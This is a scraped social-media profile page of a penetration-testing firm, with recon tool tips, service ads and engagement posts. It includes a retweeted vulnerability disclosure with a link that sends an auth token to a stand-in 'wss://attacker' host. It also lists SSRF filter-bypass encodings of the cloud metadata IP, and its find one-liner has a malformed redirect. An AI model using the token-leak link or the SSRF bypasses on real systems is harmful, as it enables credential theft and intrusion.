haksec.io

1.1K posts

haksec.io banner
haksec.io

haksec.io

@haksecio

👨‍💻 Penetration testing 🧑‍💼 Cybersecurity consulting 🎓Appsec training 🌏 Born in Australia, serving customers globally Founded by @hakluke

Australia Katılım Nisan 2021
18 Takip Edilen11.9K Takipçiler
Sabitlenmiş Tweet
haksec.io
haksec.io@haksecio·
Our cybersecurity services: 🕸 Web application penetration testing 🌐 Network penetration testing 💪 Secure development training ⚔️ EASM 🏷 Whitelabeled services ☁️ Cloud security reviews 👮 General security consulting DM us for details 📨 haksec.io
English
1
0
9
3.4K
HackingHub
HackingHub@hackinghub_io·
Without naming the bug class, tell me 3 things about it that only a real hacker would recognize. 🕶️ Let's see who’s actually been in the terminal. 👇
GIF
English
2
0
11
1.2K
HackingHub
HackingHub@hackinghub_io·
$5K on the line. 💰  3 minutes to find one bug. Which vuln class are you betting on? 👇
English
19
2
48
6.3K
haksec.io retweetledi
Luke Stephens (hakluke)
Luke Stephens (hakluke)@hakluke·
If you are marketing a cybersecurity company, you need to watch this 👀
English
3
3
16
2K
haksec.io retweetledi
André Baptista
André Baptista@0xacb·
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…
English
24
157
677
120.4K
haksec.io
haksec.io@haksecio·
Could this be the longest way to perform Google dorks? 😂
English
0
3
7
1.2K
haksec.io
haksec.io@haksecio·
How to quickly find any mention of something in your files with the find command: ⌨️ find . -name "*zdns*" 2>1& Watch this 📺👇
English
0
2
5
826
haksec.io
haksec.io@haksecio·
Mass-perform AXFR requests on domains with hakaxfr! A simple Go tool for attempting zone transfers. Install here: github.com/hakluke/hakaxfr
English
0
1
6
631
haksec.io
haksec.io@haksecio·
Need to extract the root domains from a list of subdomains? Try using dsieve by @trick3st! Really handy tool for filtering and enriching a list of subdomains!
haksec.io tweet media
English
2
4
27
2.4K
haksec.io
haksec.io@haksecio·
Using 3 words or less, why did you start hacking?
English
6
1
10
1.4K
haksec.io
haksec.io@haksecio·
EASM is not just for defenders. It can also be used for offensive security! Here are some advanced subdomain recon techniques for your own (offensive) EASM 👇 labs.detectify.com/how-to/advance…
English
0
0
0
516
haksec.io
haksec.io@haksecio·
Anyone else do this or just me?
haksec.io tweet media
English
1
1
6
842
haksec.io
haksec.io@haksecio·
What's the dumbest solution to a tech problem that actually worked?
English
1
0
3
726
haksec.io
haksec.io@haksecio·
Check the rep of an email address with emailrep.io! Discover if an email is linked to suspicious activity or if it is legit! Great for your next OSINT investigation!
English
0
1
4
718
haksec.io
haksec.io@haksecio·
A quick way to get the ASN details of an organization using @pdiscoveryio's ASNmap! ⌨️ asnmap -org PAYPAL -json | jq -r .as_number | sort -u
haksec.io tweet media
English
0
20
90
4.5K
haksec.io
haksec.io@haksecio·
Every customer's security needs are unique, that's why we pride ourselves on providing bespoke solutions including: - Web app and network penetration testing - Secure dev training - EASM - Whitelabeling - Cloud security reviews - General consulting haksec.io
English
1
1
9
898
haksec.io
haksec.io@haksecio·
You can choose one vulnerability scanner, what is it?
English
3
1
6
2.2K
haksec.io
haksec.io@haksecio·
Dump DNS records en masse with zdns! As you can see below, Paypal have TXT records related to Notion, Stripe and Miro! Install here: github.com/zmap/zdns
haksec.io tweet media
English
7
14
34
3.9K
haksec.io
haksec.io@haksecio·
Get CIDR ranges associated with an organization with @pdiscoveryio's ASNmap! All you need to do is "asnmap -org <ORG-NAME>" and you'll get a list CIDRs to do with as you so please!
haksec.io tweet media
English
1
25
87
4.3K
haksec.io
haksec.io@haksecio·
4. Non-standard IP notations can sneak past filters looking for 169.254.169.254 specifically. Try octal (025177524776), hex (0xa9fea9fe), integer (2852039166), or IPv6 (::ffff:a9fe:a9fe) notation.
English
1
0
4
599
haksec.io
haksec.io@haksecio·
If your SSRF attempts don't work initially, there are some common bypasses you can try. Here's are 4 techniques to bypass SSRF filters:
English
2
9
61
7.4K